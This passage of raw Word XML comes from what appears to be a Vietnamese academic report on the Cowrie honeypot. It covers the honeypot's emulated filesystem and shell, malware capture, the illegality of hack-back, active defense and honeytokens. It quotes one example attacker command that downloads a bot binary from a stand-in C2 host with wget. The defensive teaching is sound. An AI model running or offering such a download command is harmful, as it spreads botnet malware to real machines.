        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Hệ thống Tệp tin Giả lập (Virtual Filesystem - fs.pickle): Thay vì để kẻ tấn công can thiệp vào ổ cứng thật của máy chủ, Cowrie sử dụng một tệp tin serialized (fs.pickle) đại diện cho cây thư mục hệ điều hành Linux Debian tiêu chuẩn (bao gồm /bin, /etc, /var, /root, /home). Khi hacker thực hiện các lệnh duyệt thư mục như ls, cd, cat, Cowrie sẽ đọc thông tin từ cấu trúc ảo này. Bất kỳ thao tác xóa file hay thay đổi quyền hạn đều chỉ tồn tại tạm thời trong bộ nhớ của phiên làm việc đó, hoàn toàn không ảnh hưởng đến hệ thống máy chủ vật lý.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Shell Emulation Engine: Cowrie tích hợp một bộ xử lý lệnh mô phỏng cho hơn 50 lệnh Linux phổ biến nhất (cat, whoami, uname, ifconfig, ps, kill, wget, curl, crontab). Khi kẻ tấn công nhập lệnh, Cowrie sẽ phân tích cú pháp (parse arguments) và trả về kết quả giả lập giống hệt như trên máy chủ thật.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. Malware Staging &amp; Payload Capture: Đây là tính năng đắt giá nhất của Cowrie. Khi kẻ tấn công thực thi lệnh tải mã độc từ xa (ví dụ: 'wget http://malicious-c2.org/arm7 -O bot.sh'), Cowrie không dùng tiến trình wget thật mà tự động sử dụng thư viện HTTP client nội bộ để âm thầm tải file nhị phân đó về thư mục cách ly 'var/lib/cowrie/downloads', tính toán mã băm SHA256 và lưu lại dấu vết phiên làm việc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5. TTY Recording &amp; Structured JSON Logging: Mọi thao tác gõ phím của kẻ tấn công đều được ghi lại dưới định dạng TTY log (cho phép xem lại như một đoạn video tua lại bằng lệnh 'bin/playlog') và toàn bộ metadata sự kiện được xuất ra tệp tin cấu trúc 'cowrie.json' thời gian thực.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5486400" cy="3092335"/>
            <wp:docPr id="2" name="Picture 2"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="hinh_2_2_kien_truc_cowrie.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="3092335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Hình 2.2: Kiến trúc mô phỏng hệ thống tệp và lệnh của Cowrie Honeypot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.3 Phân tích Pháp lý và Kỹ thuật về 'Tấn công ngược' (Hack-back vs. Active Defense)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong các cuộc thảo luận kỹ thuật an ninh mạng, cụm từ 'Tấn công ngược kẻ tấn công' (Counter-attack hoặc Hack-back) thường xuyên được nhắc đến như một khát vọng phản kháng của đội ngũ phòng thủ (Blue Team). Tuy nhiên, trên cả phương diện kỹ thuật thực tế và khung pháp lý quốc tế lẫn Việt Nam, việc thực hiện 'Hack-back' mù quáng tiềm ẩn những rủi ro pháp lý và kỹ thuật đặc biệt nghiêm trọng:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Bài toán Phân định Mục tiêu (Attribution Problem): Trong không gian mạng, các tin tặc chuyên nghiệp và các mạng botnet hiếm khi tấn công trực tiếp từ máy tính cá nhân của chúng. Chúng luôn giấu mình sau nhiều lớp Proxy ẩn danh, mạng Tor, máy chủ VPN thương mại, hoặc nguy hiểm hơn là thông qua hàng triệu thiết bị IoT (Router, Camera) của các nạn nhân vô tội bị chiếm quyền điều khiển. Nếu Blue Team thực hiện 'tấn công ngược' (như phát động DoS hay khai thác lỗ hổng) vào địa chỉ IP nguồn, chúng ta sẽ trực tiếp xâm phạm và phá hoại hệ thống của bên thứ ba vô tội, biến chính mình từ nạn nhân thành tội phạm công nghệ cao.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>• Khung Pháp lý Hiện hành: Điều 287 và Điều 289 Bộ luật Hình sự Việt Nam năm 2015 (sửa đổi, bổ sung 2017), Luật An ninh mạng Việt Nam 2018, cũng như Đạo luật Lạm dụng và Gian lận Máy tính của Hoa Kỳ (CFAA) đều nghiêm cấm mọi hành vi truy cập bất hợp pháp, phá hoại hoặc làm gián đoạn hoạt động của mạng máy tính mà không có thẩm quyền hợp pháp, bất kể mục đích của hành vi đó là để 'tự vệ' hay 'phản đòn'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Chính vì lý do đó, các tổ chức an ninh mạng hàng đầu thế giới đã định nghĩa lại khái niệm phản đòn thành: **Phòng thủ Chủ động (Active Defense &amp; Active Deception)** theo chuẩn khung chiến lược **MITRE Engage (trước đây là MITRE Shield)** và **MITRE D3FEND**. Phòng thủ chủ động là nghệ thuật tác chiến hợp pháp và an toàn tuyệt đối, tập trung vào việc:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>1. Nhử đối phương vào các tài nguyên giả định (Decoy &amp; Lures).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>2. Đánh lừa và cung cấp thông tin sai lệch để đối phương tiêu hao nguồn lực vô ích (Tarpitting).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3. Trinh sát ngược nguồn mở (Reverse OSINT) để nhận diện hạ tầng của đối phương mà không vi phạm pháp luật.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>4. Gài bẫy mồi nhử (Honeytokens) để khi kẻ tấn công mang chiến lợi phẩm về mở trên máy thật của chúng, hệ thống sẽ bắt được vị trí và danh tính thực sự của đối thủ (De-anonymization).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="80" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Bảng 2.2: So sánh toàn diện giữa Tấn công ngược bất hợp pháp và Phòng thủ chủ động hợp pháp</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tiêu chí So sánh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tấn công ngược (Hack-Back / Strike Back)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Phòng thủ Chủ động (Active Defense / MITRE Engage)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tính Hợp pháp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Trái pháp luật (Vi phạm Điều 287 BLHS, Luật ANM 2018).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Hoàn toàn Hợp pháp (Tuân thủ quyền tự bảo vệ hệ thống nội bộ).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Đối tượng Tác động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tác động trực tiếp vào máy chủ của IP tấn công (Dễ trúng máy vô tội).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tác động trong phạm vi tài nguyên và hệ thống bẫy do ta sở hữu.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Mục tiêu Tác chiến</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Cố gắng phá hủy, xâm nhập hoặc DoS máy đối phương.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Thu thập tình báo (OSINT), làm kiệt quệ tài nguyên, lật tẩy danh tính thật.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Độ rủi ro Hệ thống</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Rất cao (Bị kiện tụng pháp lý, bị trả đũa quy mô lớn hơn).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Rất thấp (Được bảo vệ trong môi trường Sandbox và Deception).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Độ tin cậy Định danh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Kém (Thường chỉ đánh trúng Proxy hoặc Botnet Zombie).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Rất cao (Lật tẩy IP thật khi hacker mở Honeytoken trên máy cá nhân).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.4 Chiến lược Đánh lừa Chủ động (Active Deception) và Kỹ thuật Honeytoken / Canary Tokens</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kỹ thuật Honeytoken (hoặc Canary Token) là một trong những vũ khí phòng thủ chủ động tinh vi nhất của an ninh mạng hiện đại. Một Honeytoken là một mẩu dữ liệu giả mạo (Fake Credential, API Key, Database Dump, File tài liệu nội bộ) được cố tình gài cắm ở những vị trí mà chỉ có kẻ xâm nhập trái phép mới tìm thấy và tò mò tiếp cận.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cơ chế Khử ẩn danh Kẻ tấn công (Adversarial De-anonymization) hoạt động dựa trên tâm lý học của tin tặc:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bước 1 - Gài bẫy (Luring): Bên trong hệ thống tệp tin của Cowrie, ta tạo ra các tệp tin có vẻ vô cùng giá trị, ví dụ: '/root/.aws/credentials', '/root/.bash_history' hoặc '/var/backups/db_dump_passwords.txt'.</w:t>
      </w:r>
    </w:p>
    <w:p>
